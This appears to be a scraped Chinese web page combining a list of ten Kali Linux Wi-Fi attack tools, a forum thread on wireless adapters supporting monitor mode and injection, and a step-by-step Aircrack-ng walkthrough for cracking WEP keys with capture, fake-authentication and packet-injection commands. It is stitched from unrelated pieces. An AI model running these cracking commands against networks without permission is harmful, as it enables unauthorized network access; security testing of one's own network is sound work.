kali linux里的kali aircrackk-ng怎么用

 上传我的文档
 下载
 收藏
该文档贡献者很忙,什么也没留下。
 下载此文档
正在努力加载中...
利用Kali Linux开展渗透测试
下载积分:2000
内容提示:利用Kali Linux开展渗透测试
文档格式:PDF|
浏览次数:15|
上传日期: 20:50:33|
文档星级:
该用户还上传了这些文档
利用Kali Linux开展渗透测试
官方公共微信中国领先的IT技术网站
51CTO旗下网站
Kali Linux中前十名的Wifi攻击工具
无线网络的攻与防一直是比较热门的话题,由于无线信号可以被一定范围内的任何人接收到(包括死黑阔),这样就给WIFI带来了安全隐患。
作者:0xroot来源:FreeBuf| 09:50
无线网络的攻与防一直是比较热门的话题,由于无线信号可以被一定范围内的任何人接收到(包括死黑阔),这样就给WIFI带来了安全隐患;路由器生产厂商和网络服务供应商(ISPs)的配置大多是默认开启了WPS,这种环境下,无线网络往往是安全渗透测试里边的重要突破口。而使用以下这10个Wifi攻击工具,我们就可以测试自己的无线网络潜在的安全问题了。
1、 Aircrack-ng
Aircrack是破解WEP/WPA/WPA2加密的主流工具之一,Aircrack-ng套件包含的工具可用于捕获数据包、握手验证。可用来进行暴力破解和字典攻击。
& Aircrack-ng 无线密码破解
& Aireplay-ng 流量生成和客户端认证
& Airodump-ng 数据包捕获
& Airbase-ng 虚假接入点配置
网站:http://www.aircrack-ng.org/
教程:http://www.hackingtutorials.org/wifi-hacking/how-to-hack-upc-wireless-networks/
2、 Reaver
排名第二的是Reaver。Reaver也是无线网络破解的另一大热门工具,适用情景:目标网络开启了WPS,WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定(Wi-Fi Protected Setup)标准,主要是为了解决长久以来无线网络加密认证设定的步骤过于繁杂艰难之弊病。
WPS用于简化Wi-Fi无线的安全设置和网络管理。目前支持两种模式:个人识别码(PIN)模式和按钮(PBC)模式。
因接入点、信号强度以及PIN的不同,使用Reaver破解无线需4-10个小时。
网站:/p/reaver-wps/
教程:http://www.hackingtutorials.org/wifi-hacking/pixie-dust-attack-wps-in-kali-linux-with-reaver/
3、 Pixiewps
Pixiewps是Kali Linux上相对较新的工具,并且针对的也是WPS漏洞,工具采用C语言编写。
功能:进行离线wps攻击
原理:通过路由中伪随机数的bug来直接攻击。
由于这个工具这段时间非常受欢迎,它已经跻身Wifi攻击工具排行中的第三位。
网站: /wiire/pixiewps/
改进版Reaver: /t6x/reaver-wps-fork-t6x
教程: http://www.hackingtutorials.org/wifi-hacking/pixie-dust-attack-wps-in-kali-linux-with-reaver/
4、 Wifite
wifite是一款自动化wep、wpa破解工具。
特点:可以同时攻击多个采用wep和wpa加密的网络
破解结果出来后,会出现PIN码和KEY。
网站:/p/wifite/
5、 Wireshark
Wireshark是最流行的网络协议分析工具之一。普遍用于捕获实时数据包:对数百个协议的数据包进行深入调查,浏览、过滤,适用于多个系统平台,如:linux、Windows、Mac。
网站: https://www.wireshark.org
教程: /104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/
6、 oclHashcat
oclHashcat也上榜了,虽然它并不是专门用于Wifi破解的工具。
HashCat主要分为三个版本:Hashcat、oclHashcat-plus、oclHashcat-lite,它们都依靠GPU的强大运算能力来进行密码破解。
网站: http://hashcat.net/oclhashcat/
Tutorial: http://www.hackingtutorials.org/wifi-hacking/cracking-wpa-oclhashcat-gpu/
7、 Fern Wifi Cracker
Fern Wifi Cracker使用了Python语言和Python的Qt图形界面库,能够破解和恢复WEP / WPA / WPS的WIFI网络,它可以进行MITM中间人攻击。
Wash可以对目标网络进行判断:是否启用WPS。
网站: /p/reaver-wps/
教程: http://www.hackingtutorials.org/wifi-hacking/wps-wifi-networks-with-kali-linux-wash/
9、 Crunch
Crunch普遍用于生成密码字典,配合其他工具使用进行暴力破解。
网站: http://sourceforge.net/projects/crunch-wordlist
教程: http://www.hackingtutorials.org/general-tutorials/password-list-with-crunch/
10、 Macchanger
Macchanger这个小工具可以修改linux主机的mac地址,在路由器中开启MAC地址过滤之后,你可以用它把自己的主机MAC地址修改成允许连接的MAC地址(前提是你知道哪个MAC地址是被允许的),用这个工具修改MAC地址也可以达到隐藏自己的目的。
网站: /alobbs/macchanger
教程: http://www.hackingtutorials.org/general-tutorials/mac-address-spoofing-with-macchanger/【编辑推荐】【责任编辑: TEL:(010)】
大家都在看猜你喜欢
专题专题专题专题专题
24H热文一周话题本月最赞
讲师:50人学习过
讲师:85人学习过
讲师:851人学习过
精选博文论坛热帖下载排行
本书从基础知识入手,详细讨论了Oracle数据库的创建、OEM及iSQL*Plus等工具的使用、Oracle的字符集知识、用户的创建与管理、表空间和数据文...
订阅51CTO邮刊求完美支持kali的(支持监听、注入)usb无线网卡?若高频大功率更好
在kali linux下渗透测试用,希望能穿墙。
按投票排序
Kali里面带一个叫Aircrack的无线网络安全工具 这个工具就是要必须使用网卡,,所以可以直接去 Aircrack网站上去看支持列表就好了
个人还是推荐TP 722N
价格略贵,芯片好,带外置天线,可以自己改装,Pi,kali,centos,ubuntu上都是即插即用
推荐的是TP-LINK 的WN722N
,国内电商可以买到. 实测在 Kali 里面可用。
强烈推荐RLT8187L,功率高,兼容性好其次是Ralink3070功率较低,兼容差,但连接上以后网络稳定,适合日常使用比较出名的就这两个
功能及效果参考linux的无线驱动 driver点进去的device项目下还有支持的网卡名称列表可供参考 TL-WN821N ver:5.0亲测kali无反应另外还有一个办法是在lib/modules/xxx-kali-xxx/kernal/drivers/net/wireless 文件夹下查看有哪些支持网卡的驱动,再进行有针对性的选购 目前在某东看见 网件的一款WNA1100貌似满足要求,东西正在配送中, 到手再说。以上。话说以上是什么意思?
ALFA AWUSO36H啊,美亚买吧,国内淘宝的都是坑爹的货。
首先你得学会怎么改功率限制,否则网卡功率再高也没用。
問一下TP-LINK 的WN722N RLT8187LRalink3070都有Linux的driver嗎
已有帐号?
无法登录?
社交帐号登录Linux使用Aircrack-ng破解WEP
1. 安装 aircrack-ng,以 Arch Linux 为例:
sudo pacman -S aircrack-ng
a. 启动无线网卡的监控模式
sudo airmon-ng start wlan0
Tips:wlan0 是无线网络接口,具体名称可使用 ifconfig 命令查看。
b. 查看无线 AP 信息
sudo airodump-ng wlan0
Tips: 用来查看当前的无线 AP 信息,如 BSSID 和 频道等等。
sudo airodump-ng -c 6 --bssid AP's MAC -w output --ivs wlan0
Tips: -c 后面的 6 是要破解的 AP 工作频道,&bissid 后面的 AP&s MAC 是要欲破解 AP 的 MAC 地址,-w 后面的 output 的是抓下来的数据包 DATA 保存的文件名。
d. 与 AP 建立虚拟连接
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC wlan0
Tips: -h 后面的 My MAC 是自己的无线网卡的 MAC 地址,可使用 ifconfig 命令查看
e. 进行攻击,加速收集 DATA
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC wlan0
收集到一定量的 DATA 后(建议超过10000)即可执行下面的命令开发解密。
aircrack-ng output*
如不能解密成功则继续收集 DATA。
破解成功后关闭监听模式
sudo airmon-ng stop wlan0
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467142',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'

我要回帖

更多关于 kali aircrack 的文章

 

随机推荐